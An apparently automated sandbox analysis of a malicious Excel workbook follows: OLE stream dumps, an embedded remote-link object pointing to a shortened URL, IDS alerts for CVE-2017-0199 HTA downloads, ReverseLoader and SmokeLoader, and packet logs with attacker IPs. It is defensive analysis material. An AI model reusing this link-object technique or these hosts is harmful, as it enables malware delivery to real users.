                                                                                                                                                  Contains VBA Macros:True
                                                                                                                                                  Code Page:1252
                                                                                                                                                  Author:
                                                                                                                                                  Last Saved By:
                                                                                                                                                  Create Time:2006-09-16 00:00:00
                                                                                                                                                  Last Saved Time:2024-11-18 01:53:06
                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                  Security:1
                                                                                                                                                  Document Code Page:1252
                                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                                  Contains Dirty Links:False
                                                                                                                                                  Shared Document:False
                                                                                                                                                  Changed Hyperlinks:False
                                                                                                                                                  Application Version:786432
                                                                                                                                                  General
                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                  VBA File Name:Sheet1.cls
                                                                                                                                                  Stream Size:977
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z 2 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7a 32 85 98 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Attribute VB_Name = "Sheet1"
                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = True
                                                                                                                                                  Attribute VB_Exposed = True
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = True
                                                                                                                                                  

                                                                                                                                                  General
                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                  VBA File Name:Sheet2.cls
                                                                                                                                                  Stream Size:977
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z 2 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7a 32 d6 fb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Attribute VB_Name = "Sheet2"
                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = True
                                                                                                                                                  Attribute VB_Exposed = True
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = True
                                                                                                                                                  

                                                                                                                                                  General
                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                  VBA File Name:Sheet3.cls
                                                                                                                                                  Stream Size:977
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z 2 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7a 32 a5 b9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Attribute VB_Name = "Sheet3"
                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = True
                                                                                                                                                  Attribute VB_Exposed = True
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = True
                                                                                                                                                  

                                                                                                                                                  General
                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                  VBA File Name:ThisWorkbook.cls
                                                                                                                                                  Stream Size:985
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z 2 s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                                                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7a 32 73 cb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Attribute VB_Name = "ThisWorkbook"
                                                                                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = True
                                                                                                                                                  Attribute VB_Exposed = True
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = True
                                                                                                                                                  

                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x1CompObj
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:114
                                                                                                                                                  Entropy:4.25248375192737
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:244
                                                                                                                                                  Entropy:2.889430592781307
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:200
                                                                                                                                                  Entropy:3.2603503175049817
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . R \\ 9 . . . . . . . . .
                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:MBD014EF417/\x1CompObj
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:99
                                                                                                                                                  Entropy:3.631242196770981
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:MBD014EF417/Package
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                  Stream Size:826073
                                                                                                                                                  Entropy:7.996268523641285
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:P K . . . . . . . . . . ! . . . . . . 0 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 01 86 c6 15 ee 01 00 00 30 09 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:MBD014EF418/\x1Ole
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:654
                                                                                                                                                  Entropy:4.6905951741404355
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . ] m 7 . V . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . l . i . n . k . . . u . e . b . i . e . . . d . e . / . b . U . P . K . f . u . ? . & . s . a . r . i . = . a . c . o . u . s . t . i . c . & . f . l . a . t . = . r . e . d . & . c . r . o . w . n . = . i . m . p . o . r . t . a . n . t . & . n . u . r . t . u . r . e . = . a . b . o . r . i . g . i . n . a . l . & . h . e . l . e . n . . . \\ } } . # . . . n . . ~ ; | . g F ' d . . c . 8 D c J 0 < . N . . . .
                                                                                                                                                  Data Raw:01 00 00 02 5d df f4 6d 37 13 d7 56 00 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f6 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 69 00 6e 00 6b 00 2e 00 75 00 65 00 62 00 69 00 65 00 2e 00 64 00 65 00 2f 00 62 00 55 00 50 00 4b 00 66 00 75 00 3f 00 26 00 73 00 61 00 72 00 69 00 3d 00 61 00 63 00 6f 00 75 00 73 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:Workbook
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                  Stream Size:330953
                                                                                                                                                  Entropy:7.99877858787851
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . @ v > f e \\ / p n } = . 2 6 u r W m . . . . . . . . . . . \\ . p . 6 ( Z m . . | F - * 4 & ) 4 x + . . . 1 . % . X # O . % q . \\ . T O r % . C ? . z x . _ l p m 9 h J J 8 . ^ J . . . L N @ . B . . . . a . . . " . . . = . . . g k _ ' . . . 3 ! * q n - > & l . . . . . . . . . . . . ! . . . . g . . . . . . . j I = . . . . . ? . d r 7 . & @ . . . . . . \\ " . . . L . . . . . U . . . g . . . g 1 . . . W r L B { f c l . . W . w - ! V Z u 1 . . . % ] ] . a `
                                                                                                                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 d9 40 76 9d 3e 66 e7 c7 65 5c db c2 f4 e3 2f eb 8f 70 6e 9d da ea 83 ff ac a4 bb 7d cb 3d 1f a0 fa 32 d9 f9 a5 b7 e9 36 75 b4 72 bd be 57 ad 6d e1 00 02 00 b0 04 c1 00 02 00 16 b6 e2 00 00 00 5c 00 70 00 36 28 5a 6d 0f 80 88 c8 1c 7c 46 8e 2d ce fb a6 2a 8f 34 26 da f0 29 b4 34 78 2b 19 06 13
                                                                                                                                                  General
                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Stream Size:527
                                                                                                                                                  Entropy:5.287119538944213
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:I D = " { 7 7 4 3 E 8 F A - 0 A 9 2 - 4 C 3 E - A B 2 1 - E E 7 9 3 6 7 6 6 5 D D } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 6 F 4 0 F 5 6 7 1 A A 2 8 A E 2
                                                                                                                                                  Data Raw:49 44 3d 22 7b 37 37 34 33 45 38 46 41 2d 30 41 39 32 2d 34 43 33 45 2d 41 42 32 31 2d 45 45 37 39 33 36 37 36 36 35 44 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                  General
                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:104
                                                                                                                                                  Entropy:3.0488640812019017
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:2644
                                                                                                                                                  Entropy:3.9834752295591898
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                  CLSID:
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:553
                                                                                                                                                  Entropy:6.368583037671422
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 4 L i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                                                                                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 34 e6 4c 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                  2024-11-18T18:21:30.915631+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249162107.172.44.17880TCP
                                                                                                                                                  2024-11-18T18:21:30.915644+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1107.172.44.17880192.168.2.2249162TCP
                                                                                                                                                  2024-11-18T18:21:33.487505+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164107.172.44.17880TCP
                                                                                                                                                  2024-11-18T18:21:33.487520+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1107.172.44.17880192.168.2.2249164TCP
                                                                                                                                                  2024-11-18T18:21:43.833570+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249165107.172.44.17880TCP
                                                                                                                                                  2024-11-18T18:21:59.492820+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249171107.172.44.17880TCP
                                                                                                                                                  2024-11-18T18:22:00.252623+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.78443192.168.2.2249166TCP
                                                                                                                                                  2024-11-18T18:22:23.312355+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.78443192.168.2.2249173TCP
                                                                                                                                                  2024-11-18T18:22:42.390367+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.224917546.173.214.2480TCP
                                                                                                                                                  2024-11-18T18:22:42.710414+01002829848ETPRO MALWARE SmokeLoader encrypted module (3)246.173.214.2480192.168.2.2249175TCP
                                                                                                                                                  2024-11-18T18:22:58.747956+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.224917646.173.214.2480TCP
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 18, 2024 18:21:28.888206005 CET49161443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:28.888256073 CET443491615.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:28.888397932 CET49161443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:28.893717051 CET49161443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:28.893734932 CET443491615.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:29.798527956 CET443491615.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:29.798629999 CET49161443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:29.805362940 CET49161443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:29.805383921 CET443491615.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:29.805978060 CET443491615.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:29.806054115 CET49161443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:29.883877039 CET49161443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:29.931325912 CET443491615.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.225498915 CET443491615.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.225579977 CET443491615.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.225599051 CET49161443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:30.226711988 CET49161443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:30.226736069 CET49161443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:30.226752043 CET443491615.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.244226933 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:30.249144077 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.249316931 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:30.249327898 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:30.254158974 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915465117 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915544033 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915555000 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915592909 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915606976 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915630102 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915631056 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:30.915643930 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915654898 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915659904 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:30.915674925 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:30.915683985 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915700912 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.915709019 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:30.915741920 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:30.920734882 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.920806885 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:30.920912027 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.920928001 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:30.920973063 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:30.921237946 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.032953024 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.033025026 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.033031940 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.033082008 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.033272028 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.033278942 CET8049162107.172.44.178192.168.2.22
